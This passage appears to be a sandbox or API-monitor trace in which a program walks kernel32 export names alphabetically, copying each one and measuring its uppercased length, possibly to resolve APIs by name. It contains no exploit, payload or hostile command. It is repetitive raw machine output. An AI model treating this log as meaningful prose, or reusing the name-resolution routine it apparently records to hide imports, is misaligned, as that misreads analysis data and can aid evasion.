lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.862] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.862] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.862] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.862] lstrlenA (lpString="ADDATOMA") returned 8 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.862] lstrlenA (lpString="ADDATOMW") returned 8 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.862] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.862] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.862] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.862] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.862] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.862] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.862] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.862] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.862] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.862] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.862] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.862] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.863] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.863] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.863] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.863] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.863] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.863] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.863] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.863] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.863] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.863] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.863] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.863] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.863] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.863] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.863] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.863] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.863] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.863] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.863] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.863] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.863] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.864] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.864] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.864] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.864] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.864] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.864] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.864] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.864] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.864] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.864] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.864] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.864] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.864] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.864] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.864] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.864] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.864] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.864] lstrlenA (lpString="BEEP") returned 4 [0180.864] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.865] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.865] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.865] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.865] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.865] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.865] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.865] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.865] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.865] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.865] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.865] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.865] lstrlenA (lpString="CANCELIO") returned 8 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.865] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.865] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.865] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.865] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.865] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.865] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.865] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.865] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.866] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.866] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.866] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.866] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.866] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.866] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.866] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.866] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.866] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.866] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.866] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.866] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.866] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.866] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.866] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.866] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.866] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.866] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.866] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.866] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.867] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.867] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.867] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.867] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.867] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.867] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.867] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.867] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.867] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.867] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.867] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.867] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.867] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.867] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.867] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.867] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.867] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.867] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.867] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.867] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.868] lstrlenA (lpString="COPYFILEA") returned 9 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.868] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.868] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.868] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.868] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.868] lstrlenA (lpString="COPYFILEW") returned 9 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.868] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.868] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.868] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.868] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.868] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 